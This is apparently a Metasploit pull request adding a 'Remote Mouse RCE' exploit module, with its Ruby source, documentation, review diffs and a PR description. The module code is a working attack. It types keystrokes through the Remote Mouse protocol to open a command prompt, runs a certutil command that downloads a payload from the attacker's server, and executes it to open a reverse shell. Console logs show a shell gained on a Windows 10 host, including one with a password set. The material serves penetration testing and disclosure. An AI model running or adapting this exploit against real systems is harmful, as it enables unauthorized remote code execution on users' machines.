### PR TITLE
remote mouse rce

### DIFF
--- a/documentation/modules/exploit/windows/misc/remote_mouse_rce.md
+++ b/documentation/modules/exploit/windows/misc/remote_mouse_rce.md
@@ -1,0 +1,114 @@
+## Vulnerable Application
+
+This module utilizes the Remote Mouse Server by Emote Interactive protocol
+to deploy a payload and run it from the server.  This module will deploy
+a payload regardless if server authentication is required.
+Tested against 4.110, current at the time of module writing
+
+Version 4.110 can be downloaded from https://www.remotemouse.net/downloads/RemoteMouse.exe
+    
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/remote_mouse_rce`
+4. Set `rhost` and `lhost` as required.
+5. Do: `run`
+6. You should get a shell as the user who is running Remote Mouse.
+
+## Options
+
+### SLEEP
+
+The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
+Defaults to `1`.
+
+## Scenarios
+
+###  Remote Mouse 4.110 on Windows 10
+
+```
+resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (remote_mouse.rb)> set rhosts 192.168.2.95
+rhosts => 192.168.2.95
+resource (remote_mouse.rb)> set lhost 192.168.2.199
+lhost => 192.168.2.199
+resource (remote_mouse.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/remote_mouse_rce) > run
+
+[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
+[*] 192.168.2.95:1978 - Connecting
+[*] 192.168.2.95:1978 - Sending Windows key
+[*] 192.168.2.95:1978 - Opening command prompt
+[*] 192.168.2.95:1978 - Sending stager
+[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
+[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
+[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
+[*] 192.168.2.95:1978 - Executing payload
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.2.95
+[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49962) at 2022-09-27 16:33:02 -0400
+[*] 192.168.2.95:1978 - Server stopped.
+[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>whoami 
+whoami
+win10prolicense\windows
+
+C:\Users\windows>systeminfo
+systeminfo
+
+Host Name:                 WIN10PROLICENSE
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.16299 N/A Build 16299
+```
+
+###  Remote Mouse 4.110 on Windows 10, with a password
+
+
+```
+resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (remote_mouse.rb)> set rhosts 192.168.2.95
+rhosts => 192.168.2.95
+resource (remote_mouse.rb)> set lhost 192.168.2.199
+lhost => 192.168.2.199
+resource (remote_mouse.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/remote_mouse_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
+[*] 192.168.2.95:1978 - Connecting
+[*] 192.168.2.95:1978 - Sending Windows key
+[*] 192.168.2.95:1978 - Opening command prompt
+[*] 192.168.2.95:1978 - Sending stager
+[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
+[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
+[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
+[*] 192.168.2.95:1978 - Executing payload
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.2.95
+[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49975) at 2022-09-27 16:36:09 -0400
+[*] 192.168.2.95:1978 - Server stopped.
+[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\86a4GsbpomvEgUS.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>
+```

--- a/documentation/modules/exploit/windows/misc/remote_mouse_rce.md
+++ b/documentation/modules/exploit/windows/misc/remote_mouse_rce.md
@@ -23,6 +23,10 @@ Version 4.110 can be downloaded from https://www.remotemouse.net/downloads/Remot
 The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
 Defaults to `1`.
 
+### PATH
+
+The path where the payload should be downloaded/staged to. Defaults to `c:\\Windows\\Temp\\`.
+
 ## Scenarios
 
 ###  Remote Mouse 4.110 on Windows 10

--- a/modules/exploits/windows/misc/remote_mouse_rce.rb
+++ b/modules/exploits/windows/misc/remote_mouse_rce.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           [ 'EDB', '46697' ],
-          [ 'CVE', '2022-xxxx' ],
+          [ 'CVE', '2022-3365' ],
           [ 'URL', 'https://www.remotemouse.net/' ],
           [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py' ]
         ],

--- a/modules/exploits/windows/misc/remote_mouse_rce.rb
+++ b/modules/exploits/windows/misc/remote_mouse_rce.rb
@@ -26,10 +26,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die', # msf module
-          'H4rk3nz0' # edb, discovery
+          '0RPHON', # discovery, edb module
+          'H4rk3nz0' # poc2
         ],
         'References' => [
           [ 'EDB', '46697' ],
+          [ 'CVE', '2022-xxxx' ],
           [ 'URL', 'https://www.remotemouse.net/' ],
           [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py' ]
         ],
@@ -42,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultOptions' => {
           'PAYLOAD' => 'windows/shell/reverse_tcp'
         },
-        'DisclosureDate' => '2022-09-20',
+        'DisclosureDate' => '2019-04-15',
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -144,6 +146,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Opening command prompt')
     send_command('cmd.exe')
+    send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440
 
     print_status('Sending stager')
     filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'
@@ -152,9 +155,11 @@ class MetasploitModule < Msf::Exploit::Remote
     stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"
     start_service('Path' => '/') # start webserver
     send_command(stager)
+    send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440
 
     print_status('Executing payload')
     send_command("#{path}#{filename} && exit")
+    send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440
 
     handler
     disconnect

--- a/modules/exploits/windows/misc/remote_mouse_rce.rb
+++ b/modules/exploits/windows/misc/remote_mouse_rce.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Remote Mouse RCE',
         'Description' => %q{
-          This module utilizes the Remote Mouse Server by  Emote Interactive protocol
+          This module utilizes the Remote Mouse Server by Emote Interactive protocol
           to deploy a payload and run it from the server.  This module will only deploy
           a payload if the server is set without a password (default).
           Tested against 4.110, current at the time of module writing
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [ARTIFACTS_ON_DISK] # typing on screen
+          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS] # typing on screen
         }
       )
     )
@@ -57,8 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1978]),
         OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
-        OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),
-        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),
+        OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\'])
       ]
     )
   end

--- a/modules/exploits/windows/misc/remote_mouse_rce.rb
+++ b/modules/exploits/windows/misc/remote_mouse_rce.rb
@@ -39,9 +39,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets' => [
           ['default', {}],
         ],
-        # 'Payload' => {
-        #  'BadChars' => "\x04\x1E"
-        # },
         'DefaultOptions' => {
           'PAYLOAD' => 'windows/shell/reverse_tcp'
         },
@@ -126,7 +123,6 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       command.each_char do |c|
         sock.put(key_value(c))
-        # sleep(datastore['SLEEP'] / 5) # real small sleep between characters
       end
       sock.put(key_value("\n"))
     end

--- a/modules/exploits/windows/misc/remote_mouse_rce.rb
+++ b/modules/exploits/windows/misc/remote_mouse_rce.rb
@@ -1,0 +1,167 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Exploit::Remote::Tcp
+  include Exploit::EXE # generate_payload_exe
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Remote Mouse RCE',
+        'Description' => %q{
+          This module utilizes the Remote Mouse Server by  Emote Interactive protocol
+          to deploy a payload and run it from the server.  This module will only deploy
+          a payload if the server is set without a password (default).
+          Tested against 4.110, current at the time of module writing
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'H4rk3nz0' # edb, discovery
+        ],
+        'References' => [
+          [ 'EDB', '46697' ],
+          [ 'URL', 'https://www.remotemouse.net/' ],
+          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py' ]
+        ],
+        'Arch' => [ ARCH_X64, ARCH_X86 ],
+        'Platform' => 'win',
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'Targets' => [
+          ['default', {}],
+        ],
+        # 'Payload' => {
+        #  'BadChars' => "\x04\x1E"
+        # },
+        'DefaultOptions' => {
+          'PAYLOAD' => 'windows/shell/reverse_tcp'
+        },
+        'DisclosureDate' => '2022-09-20',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK] # typing on screen
+        }
+      )
+    )
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1978]),
+        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
+        OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),
+        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),
+      ]
+    )
+  end
+
+  def path
+    return datastore['PATH'] if datastore['PATH'].end_with? '\\'
+
+    "#{datastore['PATH']}\\"
+  end
+
+  def key_value(key)
+    characters = {
+      'A' => '8[ras]116', 'B' => '8[ras]119', 'C' => '8[ras]118', 'D' => '8[ras]113', 'E' => '8[ras]112',
+      'F' => '8[ras]115', 'G' => '8[ras]114', 'H' => '8[ras]125', 'I' => '8[ras]124', 'J' => '8[ras]127',
+      'K' => '8[ras]126', 'L' => '8[ras]121', 'M' => '8[ras]120', 'N' => '8[ras]123', 'O' => '8[ras]122',
+      'P' => '8[ras]101', 'Q' => '8[ras]100', 'R' => '8[ras]103', 'S' => '8[ras]102', 'T' => '7[ras]97',
+      'U' => '7[ras]96', 'V' => '7[ras]99', 'W' => '7[ras]98', 'X' => '8[ras]109', 'Y' => '8[ras]108',
+      'Z' => '8[ras]111',
+
+      'a' => '7[ras]84', 'b' => '7[ras]87', 'c' => '7[ras]86', 'd' => '7[ras]81', 'e' => '7[ras]80',
+      'f' => '7[ras]83', 'g' => '7[ras]82', 'h' => '7[ras]93', 'i' => '7[ras]92', 'j' => '7[ras]95',
+      'k' => '7[ras]94', 'l' => '7[ras]89', 'm' => '7[ras]88', 'n' => '7[ras]91', 'o' => '7[ras]90',
+      'p' => '7[ras]69', 'q' => '7[ras]68', 'r' => '7[ras]71', 's' => '7[ras]70', 't' => '7[ras]65',
+      'u' => '7[ras]64', 'v' => '7[ras]67', 'w' => '7[ras]66', 'x' => '7[ras]77', 'y' => '7[ras]76',
+      'z' => '7[ras]79',
+
+      '1' => '6[ras]4', '2' => '6[ras]7', '3' => '6[ras]6', '4' => '6[ras]1', '5' => '6[ras]0',
+      '6' => '6[ras]3', '7' => '6[ras]2', '8' => '7[ras]13', '9' => '7[ras]12', '0' => '6[ras]5',
+
+      "\n" => '3RTN', "\b" => '3BAS', ' ' => '7[ras]21',
+
+      '+' => '7[ras]30', '=' => '6[ras]8', '/' => '7[ras]26', '_' => '8[ras]106', '<' => '6[ras]9',
+      '>' => '7[ras]11', '[' => '8[ras]110', ']' => '8[ras]104', '!' => '7[ras]20', '@' => '8[ras]117',
+      '#' => '7[ras]22', '$' => '7[ras]17', '%' => '7[ras]16', '^' => '8[ras]107', '&' => '7[ras]19',
+      '*' => '7[ras]31', '(' => '7[ras]29', ')' => '7[ras]28', '-' => '7[ras]24', "'" => '7[ras]18',
+      '"' => '7[ras]23', ':' => '7[ras]15', ';' => '7[ras]14', '?' => '7[ras]10', '`' => '7[ras]85',
+      '~' => '7[ras]75', '\\' => '8[ras]105', '|' => '7[ras]73', '{' => '7[ras]78', '}' => '7[ras]72',
+      ',' => '7[ras]25', '.' => '7[ras]27'
+    }
+    "key  #{characters[key]}"
+  end
+
+  def windows_key
+    'key  3cmd'
+  end
+
+  def check
+    connect
+    response = sock.get_once
+    disconnect
+    if response.include?('SIN 15win nop nop')
+      splits = response.split(' ')
+      return CheckCode::Appears("Received handshake with version: #{splits.last}")
+    end
+
+    CheckCode::Unknown('Invalid response from target')
+  end
+
+  def send_command(command)
+    if command == windows_key
+      sock.put(command)
+    elsif (command == "\n") || (command == "\b") # dont split this up
+      sock.put(key_value(c))
+    else
+      command.each_char do |c|
+        sock.put(key_value(c))
+        # sleep(datastore['SLEEP'] / 5) # real small sleep between characters
+      end
+      sock.put(key_value("\n"))
+    end
+    sleep(datastore['SLEEP'])
+  end
+
+  def on_request_uri(cli, _req)
+    p = generate_payload_exe
+    send_response(cli, p)
+    print_good("Payload request received, sending #{p.length} bytes of payload for staging")
+  end
+
+  def exploit
+    connect
+
+    print_status('Connecting')
+    print_status('Sending Windows key')
+    send_command(windows_key)
+
+    print_status('Opening command prompt')
+    send_command('cmd.exe')
+
+    print_status('Sending stager')
+    filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'
+    register_file_for_cleanup("#{path}#{filename}")
+    # I attempted to put this all in one, stage, run, exit, but it was never successful, so we'll keep it in 2
+    stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"
+    start_service('Path' => '/') # start webserver
+    send_command(stager)
+
+    print_status('Executing payload')
+    send_command("#{path}#{filename} && exit")
+
+    handler
+    disconnect
+    sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert
+  end
+end


### PR DESCRIPTION
@H4rk3nz0 I tried setting a password in the Remote Mouse server UI, it had no effect on the exploit.  Seems like maybe a client side thing?  If so, this will be a CVE.  Just wanted to get your input since you tested it a while ago.

This PR adds a new exploit for the Remote Mouse software.  It's another 1 off from Unified Remote/mobile mouse and wifi mouse. 

The software allows a remote person to connect and execute screen commands via mobile device.  We use the protocol to spawn a run prompt, `certutil` down a payload and execute it.

## Verification

- [ ] install software
- [ ] Start `msfconsole`
- [ ] `use exploits/windows/misc/remote_mouse_rce`
- [ ] `set rhosts`
- [ ] `set lhost`
- [ ] `run`
- [ ] **Verify** you get a userland shell
- [ ] **Verify** if software is set with a password, module bails gracefully
- [ ] **Document** looks good
